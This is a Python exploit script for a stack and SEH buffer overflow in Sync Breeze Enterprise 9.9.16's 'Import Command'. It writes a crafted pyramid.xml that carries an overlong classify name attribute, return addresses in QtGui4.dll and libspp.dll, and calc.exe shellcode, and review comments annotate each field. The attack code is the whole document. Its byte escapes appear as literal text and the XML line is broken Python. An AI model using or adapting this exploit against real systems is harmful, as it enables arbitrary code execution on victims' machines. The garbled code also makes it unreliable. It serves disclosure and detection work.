#!/usr/bin/python

# Exploit Title : Sync Breeze Enterprise 9.9.16 - 'Import Command' Buffer Overflow
# Discovery by : Anurag Srivastava
# Email : anurag.srivastava@pyramidcyber.com
# Website : www.pyramidcyber.com
# Discovery Date : 21/08/2017
# Software Link : http://www.syncbreeze.com/setups/syncbreezeent_setup_v9.9.16.exe
# Tested Version : 9.9.16
# Tested on OS : Windows 7 Ultimate x64bit and Windows 10 Home Edition x64
# Steps to Reproduce: Run the Python file to generate pyramid.xml, then open the Sync Breeze software, right-click and choose the import command, and select the pyramid.xml file.

import os,struct

# Layout of the overlong value assembled in `evil` below and written to
# pyramid.xml:
#   filler | return-address overwrite | padding + stub | padding |
#   SEH record (next + handler) | padding | payload
# NOTE(review): in this copy the byte strings appear as plain text such as
# "x90" rather than as byte escapes, and the `file = ...` line is not valid
# Python as displayed; the page's rendering appears to have altered them. The
# comments below record what each field is labelled as by the author, not
# verified runtime behaviour.

# Filler: 1560 "A" characters. The author's label gives this as the offset to
# the saved EIP.
junk = "A" * (1560)

# 32-bit little-endian address, labelled by the author as a JMP ESP inside
# QtGui4.dll. A hard-coded module address is only stable when the DLL loads at
# a fixed base, so this presumably relies on the module shipping without ASLR
# (/DYNAMICBASE) -- TODO confirm against the installed binary.
jmp1 = struct.pack('<L',0x651bb77a)

# Padding unit, labelled NOPS by the author; repeated 16, 64 and 10 times when
# `evil` is assembled.
nops = "x90"

# Author's label: LEA EAX, [ESP+76] (0x4c is 76 decimal).
esp = "x8Dx44x24x4c"

# Author's label: JMP ESP.
# NOTE(review): FF E0 is normally the encoding of JMP EAX, which would pair
# with the LEA EAX above -- confirm the label.
jmp2 = "xFFxE0"

# Next-SEH field of the exception record: two padding bytes followed by what
# the author labels a short jump of 5.
nseh = "x90x90xEBx05" # author: "Jump short 5"



# Handler field of the exception record: little-endian address labelled
# POP POP RET in libspp.dll. Pointing a handler at an address inside a loaded
# module is what SafeSEH (/SAFESEH) and SEHOP are designed to reject, so this
# presumably depends on libspp.dll being built without SafeSEH -- TODO confirm.
seh = struct.pack('<L',0x10015FFE)


# Payload, labelled CALC.EXE by the author. The hex values 63 61 6c 63 near the
# end spell "calc" in ASCII, which is consistent with that label; presumably a
# proof-of-execution payload only.
shellcode = "x31xdbx64x8bx7bx30x8bx7fx0cx8bx7fx1cx8bx47x08x8bx77x20x8bx3fx80x7ex0cx33x75xf2x89xc7x03x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x89xddx8bx34xafx01xc6x45x81x3ex43x72x65x61x75xf2x81x7ex08x6fx63x65x73x75xe9x8bx7ax24x01xc7x66x8bx2cx6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x89xd9xb1xffx53xe2xfdx68x63x61x6cx63x89xe2x52x52x53x53x53x53x53x53x52x53xffxd7"


# The concatenation order fixes the field layout described at the top. Both a
# return-address overwrite and an SEH record are present; which path a given
# target takes cannot be determined from this listing.
evil = junk + jmp1 + nops * 16 + esp + jmp2 + nops * 64 + nseh + seh + nops * 10 + shellcode


# XML document with a single <classify> element whose name attribute carries
# the overlong value. For detection and input validation, the distinguishing
# artefact is an import file whose classify name attribute is longer than
# 1560 characters, far beyond a plausible command name.
# NOTE(review): the quoting on this line is broken as displayed, and `file`
# shadows the Python 2 builtin of the same name.
file='<?xml version="1.0" encoding="UTF-8"?> <classify name='' + evil + ' </classify>'

# Writes pyramid.xml to the current working directory in text mode; the handle
# is closed explicitly rather than through a `with` block.
f = open('pyramid.xml', 'w')
f.write(file)
f.close()